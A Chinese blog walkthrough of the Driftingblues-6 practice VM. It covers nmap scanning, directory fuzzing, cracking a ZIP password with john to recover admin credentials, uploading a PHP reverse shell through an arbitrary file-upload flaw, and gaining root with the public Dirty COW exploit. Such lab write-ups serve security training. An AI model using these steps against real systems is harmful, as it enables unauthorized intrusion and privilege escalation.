Hackmyvm综合靶机 | Driftingblues-6

最新推荐文章于 2023-05-30 11:30:00 发布
最新推荐文章于 2023-05-30 11:30:00 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: # 靶场WP 文章标签: web安全 安全 linux 靶机渗透 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45996361/article/details/124175238
版权
本文介绍了对Driftingblues-6靶机的渗透测试过程,包括信息收集、图片隐写分析、隐藏目录Fuzzing、ZIP密码爆破、文件上传漏洞利用及脏牛提权等步骤。通过gobuster发现并进入/robots目录,获取后台登录凭证,利用文件上传漏洞获取shell,并针对特定内核版本实施脏牛提权。
摘要由CSDN通过智能技术生成

前言提要

今天没有废话…

kali:192.168.132.139

靶机IP:192.168…132.175

信息收集

nmap -sS -A -sV -T4 -p- 192.168.132.175

-sS:半开扫描,很少有系统会把他记录在系统日志里面,不过需要root权限
-A:全面系统检测,启动脚本检测、扫描等
-sV:探测端口服务版本
-T4:针对TCP端口禁止动态扫描延迟超过10ms
-p-:全端口扫描

image-20220411211945945

只开启了80端口,那我们一定要去web页面看一看

进入页面发现有一张显眼的图片(这个时候我怀疑是否存在隐写)

同时检查了一下源代码并没有扫描隐藏信息

图片隐写刺探

将图片下载本地,但是没有图片隐藏

wget http://192.168.132.175/db.png
#用了俩个隐写刺探工具
binwalk db.png
exiftool db.png

image-20220411213035983

隐藏目录FUZZ

这里不推荐使用dirb(扫描太慢了!!!)

我使用的是gobuster(事实上是我试了三个,还有)

dirb http://192.168.132.175 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -X .zip -w

gobuster dir -u http://192.168.132.175 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip

image-20220411213707754

根据扫描目录发现/robots目录进去看看

暴露出来一个目录(虽然写着禁止但是我们肯定是要进去看看的)

image-20220411213538370

去到目录下是一个后台登陆地址,需要账号密码

ZIP密码爆破

不要忘记我们扫描目录的时候还扫出来一个ZIP

下载下来看看,需要爆破密码

wget http://192.168.132.175/spammer.zip
unzip spammer.zip 

zip2john spammer.zip > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

image-20220411214330674

ZIP的密码爆破出来了,解压后是一个文本里面有后台账号密码

账号:mayer 密码:lionheart

文件上传漏洞

搜索后台发现一处文件上传处,经过测试居然是任意文件上传

上传我们的反弹shell马(后来在admin下找到文件上传地址:/textpattern/files)

cp /usr/share/webshells/php/php-reverse-shell.php .
vim php-reverse-shell.php

image-20220411224000396

在kali处接收反弹shell

查看内核版本(看到这个版本,那就快乐的Dirty-cow Linux内核提权吧)

红红火火恍恍惚惚哈哈哈哈哈

image-20220411215309681

脏牛提权

uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux 
内核版本>= 2.6.22  , 尝试脏牛提权
直接利用网上公开的exp进行尝试提权:https://github.com/FireFart/dirtycow
进行编译,生成一个dirty的可执行文件:gcc -pthread dirty.c -o dirty -lcrypt
执行./dirty 密码命令,即可进行提权。

image-20220411225122920

1erkeU
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hackmyvm综合靶机 | Driftingblues-1
IerkeU的博客
04-01 3182
前提概要 靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / nmap下的工具) 二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程… 信息收集 arp-scan 192.168.132.0/24 之前都是扫出目标后就之间nmap一把梭 后面了解到这样容易暴露目标 所以
Hackmyvm综合靶机 | HackMyVM-Area51
IerkeU的博客
04-18 2986
一个集合了Weblogic4j的漏洞且可以使用通杀漏洞:Linux Polkit提权靶机,很不错哦
Hackmyvm综合靶机 | Driftingblues-4
IerkeU的博客
04-11 1858
Driftingblues-4靶机过程记录
Hackmyvm综合靶机 | Driftingblues-9(完结)
IerkeU的博客
04-20 616
缓冲区溢出提权
kali渗透综合靶机(十五)--Breach-1.0靶机
W小哥
04-01 2222
一、靶机下载 下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip 二、Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为ho...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
PyPI 官网下载 | awkward-0.12.13.tar.gz
02-10
6. **setup.py**:Python的安装脚本,使用setuptools或distutils来构建、打包和安装awkward库。 7. **requirements.txt**:列出awkward运行所需的Python依赖库及其版本,方便用户安装。 在使用awkward处理数据时,...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
kali渗透综合靶机(十三)--Dina 1.0靶机
WY92139010的博客
06-03 707
kali渗透综合靶机(十三)--Dina 1.0靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.181    三、端口服务识别 1. nmap -sV -T4 -O -p ,80 192.168.10.181 ...
kali渗透综合靶机(六)--FristiLeaks靶机
W小哥
03-11 1429
一、靶机下载 下载链接:https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova 二、FristiLeaks靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.1...
kali渗透综合靶机(十二)--SickOs1.2靶机
W小哥
03-30 1632
一、靶机下载 下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip 二、SickOs1.2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.9 1、主机发...
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2888
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1049
https://download.vulnhub.com/theether/theEther_1.0.1.zip
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1010
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
17. CTF综合靶机渗透(十)
weixin_30335353的博客
07-18 538
靶机描述:欢迎来到超级马里奥主机!这个虚拟机是对真实世界场景场景的模拟。目标是在VM中找到2个标志。根是不够的(对不起!)VM可以以多种方式开发,但请记住枚举是关键。挑战的程度是中等的。感谢VDBAN、KLTWD、MRB3N和GKNSB进行测试。 靶机渗透: 本次攻击机依然采取的是kali+windows,kali跟靶机都采用的是桥接模式, 攻击机IP为:192.168.0.106 我...
漏洞payload 靶机_kali渗透综合靶机(十六)--evilscience靶机
weixin_34239718的博客
12-23 480
kali渗透综合靶机(十六)--evilscience靶机一、主机发现1.netdiscover -i eth0 -r 192.168.10.0/24二、端口扫描1. masscan --rate=10000 -p0-65535 192.168.10.195三、端口服务识别1. nmap -sV -T4 -O -p 22,80 192.168.10.195四、漏洞查找与利用1.目录扫描2. 发现h...
综合靶机渗透测试解析
w_j_x_123的博客
05-30 564
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描
05-26
Nmap是一款强大的网络发现和安全审计工具,可以用来扫描目标主机的端口和服务,以确定其漏洞和安全风险。 以下是使用Nmap工具对Metasploitable2-XP和Metasploitable2-Linux进行端口扫描的步骤: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1erkeU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值